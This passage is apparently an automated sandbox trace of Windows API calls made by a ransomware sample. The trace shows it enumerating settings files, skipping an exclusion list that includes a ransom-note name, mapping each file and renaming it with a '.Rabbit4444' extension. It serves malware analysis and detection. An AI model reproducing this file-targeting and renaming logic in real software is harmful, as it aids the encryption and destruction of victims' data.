(lpString1="AAA_SettingsGroupMapsUpdates.settingcontent-ms", lpString2="boot") returned -1 [0056.374] lstrcmpiW (lpString1="AAA_SettingsGroupMapsUpdates.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.374] lstrcmpiW (lpString1="AAA_SettingsGroupMapsUpdates.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.374] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupMapsUpdates.settingcontent-ms" | out: lpString1="AAA_SettingsGroupMapsUpdates.settingcontent-ms") returned="AAA_SettingsGroupMapsUpdates.settingcontent-ms" [0056.374] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupMapsUpdates.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.374] lstrlenW (lpString="AAA_SettingsGroupMapsUpdates.settingcontent-ms") returned 46 [0056.374] lstrlenW (lpString="Rabbit4444") returned 10 [0056.374] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.374] lstrlenW (lpString=".dll") returned 4 [0056.374] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.374] lstrlenW (lpString=".lnk") returned 4 [0056.374] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.374] lstrlenW (lpString=".ini") returned 4 [0056.374] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.374] lstrlenW (lpString=".sys") returned 4 [0056.374] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.374] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupMapsUpdates.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupmapsupdates.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.374] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.375] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14768529788) returned 1 [0056.375] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1110) returned 1 [0056.375] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0056.375] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0056.375] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x298 [0056.376] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0056.376] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.376] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0056.377] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.377] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0056.377] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.377] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0056.377] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.377] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0056.377] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14768771072) returned 1 [0056.377] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0056.377] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0056.377] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.377] CloseHandle (hObject=0x298) returned 1 [0056.377] CloseHandle (hObject=0x278) returned 1 [0056.377] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupMapsUpdates.settingcontent-ms.Rabbit4444") returned 174 [0056.377] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupMapsUpdates.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupmapsupdates.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupMapsUpdates.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupmapsupdates.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.378] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf24b5566, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf24b5566, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x490, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupNotificationsAppList.settingcontent-ms", cAlternateFileName="AAC25D~1.SET")) returned 1 [0056.378] lstrcmpiW (lpString1="AAA_SettingsGroupNotificationsAppList.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.378] lstrcmpiW (lpString1="AAA_SettingsGroupNotificationsAppList.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.378] lstrcmpiW (lpString1="AAA_SettingsGroupNotificationsAppList.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.378] lstrcmpiW (lpString1="AAA_SettingsGroupNotificationsAppList.settingcontent-ms", lpString2=".") returned 1 [0056.378] lstrcmpiW (lpString1="AAA_SettingsGroupNotificationsAppList.settingcontent-ms", lpString2="..") returned 1 [0056.378] lstrcmpiW (lpString1="AAA_SettingsGroupNotificationsAppList.settingcontent-ms", lpString2="windows") returned -1 [0056.378] lstrcmpiW (lpString1="AAA_SettingsGroupNotificationsAppList.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.378] lstrcmpiW (lpString1="AAA_SettingsGroupNotificationsAppList.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.378] lstrcmpiW (lpString1="AAA_SettingsGroupNotificationsAppList.settingcontent-ms", lpString2="boot") returned -1 [0056.379] lstrcmpiW (lpString1="AAA_SettingsGroupNotificationsAppList.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.379] lstrcmpiW (lpString1="AAA_SettingsGroupNotificationsAppList.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.379] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupNotificationsAppList.settingcontent-ms" | out: lpString1="AAA_SettingsGroupNotificationsAppList.settingcontent-ms") returned="AAA_SettingsGroupNotificationsAppList.settingcontent-ms" [0056.379] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupNotificationsAppList.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.379] lstrlenW (lpString="AAA_SettingsGroupNotificationsAppList.settingcontent-ms") returned 55 [0056.379] lstrlenW (lpString="Rabbit4444") returned 10 [0056.379] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.379] lstrlenW (lpString=".dll") returned 4 [0056.379] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.379] lstrlenW (lpString=".lnk") returned 4 [0056.379] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.379] lstrlenW (lpString=".ini") returned 4 [0056.379] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.379] lstrlenW (lpString=".sys") returned 4 [0056.379] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.379] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupNotificationsAppList.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupnotificationsapplist.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.380] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.380] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14769034489) returned 1 [0056.380] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1168) returned 1 [0056.380] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0056.380] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0056.380] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790, lpName=0x0) returned 0x298 [0056.381] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790) returned 0x70000 [0056.382] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.382] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.382] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.382] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.382] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.382] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.382] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.382] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.382] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14769303309) returned 1 [0056.382] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0056.382] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0056.382] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.382] CloseHandle (hObject=0x298) returned 1 [0056.383] CloseHandle (hObject=0x278) returned 1 [0056.383] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupNotificationsAppList.settingcontent-ms.Rabbit4444") returned 183 [0056.383] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupNotificationsAppList.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupnotificationsapplist.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupNotificationsAppList.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupnotificationsapplist.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.383] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf267f231, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf267f231, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x2391d733, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x475, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms", cAlternateFileName="AAECAE~1.SET")) returned 1 [0056.383] lstrcmpiW (lpString1="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.383] lstrcmpiW (lpString1="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.383] lstrcmpiW (lpString1="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.383] lstrcmpiW (lpString1="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms", lpString2=".") returned 1 [0056.383] lstrcmpiW (lpString1="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms", lpString2="..") returned 1 [0056.383] lstrcmpiW (lpString1="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms", lpString2="windows") returned -1 [0056.383] lstrcmpiW (lpString1="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.384] lstrcmpiW (lpString1="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.384] lstrcmpiW (lpString1="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms", lpString2="boot") returned -1 [0056.384] lstrcmpiW (lpString1="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.384] lstrcmpiW (lpString1="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.384] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms" | out: lpString1="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms") returned="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms" [0056.384] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupOneSyncAccounts.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.384] lstrlenW (lpString="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms") returned 50 [0056.384] lstrlenW (lpString="Rabbit4444") returned 10 [0056.384] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.384] lstrlenW (lpString=".dll") returned 4 [0056.384] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.384] lstrlenW (lpString=".lnk") returned 4 [0056.384] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.384] lstrlenW (lpString=".ini") returned 4 [0056.384] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.384] lstrlenW (lpString=".sys") returned 4 [0056.384] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.384] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupOneSyncAccounts.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouponesyncaccounts.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.384] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.384] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14769519887) returned 1 [0056.384] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1141) returned 1 [0056.385] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0056.385] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0056.385] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x780, lpName=0x0) returned 0x298 [0056.386] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x780) returned 0x70000 [0056.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0056.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0056.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0056.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0056.387] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14769774682) returned 1 [0056.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0056.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0056.387] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.387] CloseHandle (hObject=0x298) returned 1 [0056.387] CloseHandle (hObject=0x278) returned 1 [0056.387] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupOneSyncAccounts.settingcontent-ms.Rabbit4444") returned 178 [0056.387] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupOneSyncAccounts.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouponesyncaccounts.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupOneSyncAccounts.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouponesyncaccounts.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.388] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2a5eee5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf2a5eee5, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupPCSystemDetails.settingcontent-ms", cAlternateFileName="AA7B22~1.SET")) returned 1 [0056.388] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDetails.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.388] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDetails.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.388] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDetails.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.388] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDetails.settingcontent-ms", lpString2=".") returned 1 [0056.388] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDetails.settingcontent-ms", lpString2="..") returned 1 [0056.388] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDetails.settingcontent-ms", lpString2="windows") returned -1 [0056.388] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDetails.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.388] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDetails.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.388] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDetails.settingcontent-ms", lpString2="boot") returned -1 [0056.388] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDetails.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.388] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDetails.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.388] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupPCSystemDetails.settingcontent-ms" | out: lpString1="AAA_SettingsGroupPCSystemDetails.settingcontent-ms") returned="AAA_SettingsGroupPCSystemDetails.settingcontent-ms" [0056.388] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemDetails.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.389] lstrlenW (lpString="AAA_SettingsGroupPCSystemDetails.settingcontent-ms") returned 50 [0056.389] lstrlenW (lpString="Rabbit4444") returned 10 [0056.389] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.389] lstrlenW (lpString=".dll") returned 4 [0056.389] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.389] lstrlenW (lpString=".lnk") returned 4 [0056.389] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.389] lstrlenW (lpString=".ini") returned 4 [0056.389] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.389] lstrlenW (lpString=".sys") returned 4 [0056.389] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.389] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemDetails.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppcsystemdetails.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.389] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.389] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14769990467) returned 1 [0056.389] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1138) returned 1 [0056.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0056.389] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x780, lpName=0x0) returned 0x298 [0056.390] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x780) returned 0x70000 [0056.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0056.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0056.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0056.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0056.392] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14770244228) returned 1 [0056.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0056.392] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.392] CloseHandle (hObject=0x298) returned 1 [0056.392] CloseHandle (hObject=0x278) returned 1 [0056.392] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemDetails.settingcontent-ms.Rabbit4444") returned 178 [0056.392] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemDetails.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppcsystemdetails.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemDetails.settingcontent-ms.Rabbit4444" (normalized: 